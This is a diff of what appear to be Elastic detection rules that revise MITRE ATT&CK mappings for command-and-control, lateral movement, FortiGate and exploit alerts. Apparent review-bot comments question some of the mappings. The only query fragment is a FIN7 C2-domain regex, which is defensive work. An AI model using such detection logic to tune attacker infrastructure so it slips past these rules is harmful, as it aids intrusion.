@@ -122,26 +122,18 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml index 8485f372dbb..45c5273ac12 100644 --- a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml +++ b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
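Review bot: The second `[[rule.threat]]` entry, TA0004 Privilege Escalation, is removed outright, so the rule now maps T1548 only to Defense Evasion. ATT&CK lists T1548 Abuse Elevation Control Mechanism under both Privilege Escalation and Defense Evasion, and the `privilege_escalation_` filename prefix suggests that tactic was intended, so a second entry carrying the same technique under TA0004 looks like the right shape rather than a duplicate to delete. If dropping it is deliberate, the `Tactic: Privilege Escalation` tag (the `tags` list is outside this hunk) should be removed with it, otherwise it becomes a tag with no backing tactic. On style, `+[[rule.threat.technique.subtechnique]] … T1548.003` is inserted with no blank line before `[rule.threat.tactic]`, while every other table added in this commit is blank-line separated; the same happens for T1573 in command_and_control_cobalt_strike_default_teamserver_cert, T1021.001 in command_and_control_rdp_remote_desktop_protocol_from_the_internet, and T1190 in initial_access_fortigate_sso_login_from_unusual_source.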
@@ -119,8 +119,22 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml index 8c04edd604d..e8d45581eff 100644 --- a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml +++ b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -123,19 +123,44 @@ Compilers transform source code into executable programs, a crucial step in soft - Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1588" name = "Obtain Capabilities" reference = "https://attack.mitre.org/techniques/T1588/" + [[rule.threat.technique.subtechnique]] id = "T1588.001" name = "Malware" reference = "https://attack.mitre.org/techniques/T1588/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/network/collection_fortigate_config_download.toml b/rules/network/collection_fortigate_config_download.toml index eaca75f0e0a..f64d546a663 100644 --- a/rules/network/collection_fortigate_config_download.toml +++ b/rules/network/collection_fortigate_config_download.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
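Review bot: The new TA0004 entry maps T1068 Exploitation for Privilege Escalation to a rule whose visible description only discusses compilers as a way to build tooling, so nothing in the hunk supports the exploitation claim; a compiler run is at most a precursor. Consider dropping T1068 or, if there is evidence behind it, stating the rationale in the rule's `description`/`note` (outside this hunk) so analysts know why an Exploitation technique fires on compiler activity. The T1127 Trusted Developer Utilities Proxy Execution entry also deserves a platform check, since as far as I recall it is Windows-scoped in ATT&CK and this is a Linux rule; please verify against the current ATT&CK data before merging.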
@@ -74,18 +74,36 @@ any where event.dataset == "fortinet_fortigate.log" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1602" name = "Data from Configuration Repository" reference = "https://attack.mitre.org/techniques/T1602/" + [[rule.threat.technique.subtechnique]] id = "T1602.002" name = "Network Device Configuration Dump" reference = "https://attack.mitre.org/techniques/T1602/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml index e586f7519a8..9f96571874e 100644 --- a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml +++ b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw", "fortinet_fortigate", "sonicwall_firewall", "suricata"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -104,32 +104,43 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_cobalt_strike_beacon.toml b/rules/network/command_and_control_cobalt_strike_beacon.toml index c5d168d66d3..9e8db1efdd1 100644 --- a/rules/network/command_and_control_cobalt_strike_beacon.toml +++ b/rules/network/command_and_control_cobalt_strike_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -82,24 +82,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml index 3e98f2fdb7b..10408f201b2 100644 --- a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml +++ b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - 
diff --git a/rules/network/command_and_control_fin7_c2_behavior.toml b/rules/network/command_and_control_fin7_c2_behavior.toml index 038ab832275..3a265f93e6b 100644 --- a/rules/network/command_and_control_fin7_c2_behavior.toml +++ b/rules/network/command_and_control_fin7_c2_behavior.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,24 +43,28 @@ destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destinati [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_halfbaked_beacon.toml b/rules/network/command_and_control_halfbaked_beacon.toml index 1330bc27526..38b3cbc3b54 100644 --- a/rules/network/command_and_control_halfbaked_beacon.toml +++ b/rules/network/command_and_control_halfbaked_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -80,24 +80,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_nat_traversal_port_activity.toml b/rules/network/command_and_control_nat_traversal_port_activity.toml index e70052c7f23..e7177215bac 100644 --- a/rules/network/command_and_control_nat_traversal_port_activity.toml +++ b/rules/network/command_and_control_nat_traversal_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,8 +75,22 @@ IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by e [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - 
diff --git a/rules/network/command_and_control_port_26_activity.toml b/rules/network/command_and_control_port_26_activity.toml index 2f266661300..9749d6d34aa 100644 --- a/rules/network/command_and_control_port_26_activity.toml +++ b/rules/network/command_and_control_port_26_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,20 +75,35 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.003" +name = "Mail Protocols" +reference = "https://attack.mitre.org/techniques/T1071/003/" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml index 1c67c535c25..1eb5e77188c 100644 --- a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml +++ b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,28 +117,39 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml index bdb7850821e..0ba2b3d849c 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -108,26 +108,31 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml index 99c927ca904..c139975d32f 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -109,14 +109,31 @@ VNC is a tool that allows remote control of computers, often used by administrat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.005" +name = "VNC" +reference = "https://attack.mitre.org/techniques/T1021/005/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/network/discovery_potential_network_sweep_detected.toml b/rules/network/discovery_potential_network_sweep_detected.toml index 0659815cbd5..823d7a5bdf6 100644 --- a/rules/network/discovery_potential_network_sweep_detected.toml +++ b/rules/network/discovery_potential_network_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,6 +81,11 @@ Network sweeps are reconnaissance techniques where attackers scan networks to id [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -108,7 +113,6 @@ reference = "https://attack.mitre.org/techniques/T1595/001/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" - [rule.threshold] field = ["source.ip"] value = 1 
diff --git a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml index 83e4f3cdfb2..d4441732d8b 100644 --- a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml +++ b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,19 +95,41 @@ FROM logs-fortinet_fortigate.* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1606" +name = "Forge Web Credentials" +reference = "https://attack.mitre.org/techniques/T1606/" + +[[rule.threat.technique.subtechnique]] +id = "T1606.002" +name = "SAML Tokens" +reference = "https://attack.mitre.org/techniques/T1606/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml index 492129f623e..1ee0865b265 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml 
+++ b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,14 +101,18 @@ RPC enables remote management and resource sharing, crucial for system administr [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml index 2072a632c94..23d4284cac2 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,14 +100,31 @@ RPC enables remote management and resource sharing across networks, crucial for [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml index 3e4f65b7211..6660e0dc3aa 100644 --- a/rules/network/initial_access_unsecure_elasticsearch_node.toml +++ b/rules/network/initial_access_unsecure_elasticsearch_node.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/11" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,14 +79,26 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" 
diff --git a/rules/network/lateral_movement_dns_server_overflow.toml b/rules/network/lateral_movement_dns_server_overflow.toml index 38b0ec200b3..829273358eb 100644 --- a/rules/network/lateral_movement_dns_server_overflow.toml +++ b/rules/network/lateral_movement_dns_server_overflow.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["network_traffic"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,14 +79,31 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" + +[[rule.threat.technique.subtechnique]] +id = "T1499.004" +name = "Application or System Exploitation" +reference = "https://attack.mitre.org/techniques/T1499/004/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml b/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml index 432f9d326c7..12e946d8171 100644 --- a/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml +++ b/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -79,18 +79,31 @@ sequence by observer.name with maxspan=15m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/promotions/execution_endgame_exploit_detected.toml b/rules/promotions/execution_endgame_exploit_detected.toml index c74ed775d20..a39b6038b0d 100644 --- a/rules/promotions/execution_endgame_exploit_detected.toml +++ b/rules/promotions/execution_endgame_exploit_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,20 +78,25 @@ Elastic Endgame is a security solution that monitors and detects exploit attempt [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - 
diff --git a/rules/promotions/execution_endgame_exploit_prevented.toml b/rules/promotions/execution_endgame_exploit_prevented.toml index 9882090ac4d..4d457df5da8 100644 --- a/rules/promotions/execution_endgame_exploit_prevented.toml +++ b/rules/promotions/execution_endgame_exploit_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,20 +80,25 @@ Elastic Endgame is a security solution designed to prevent exploits by monitorin [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml index da56645fb6b..6368ebe68c5 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" 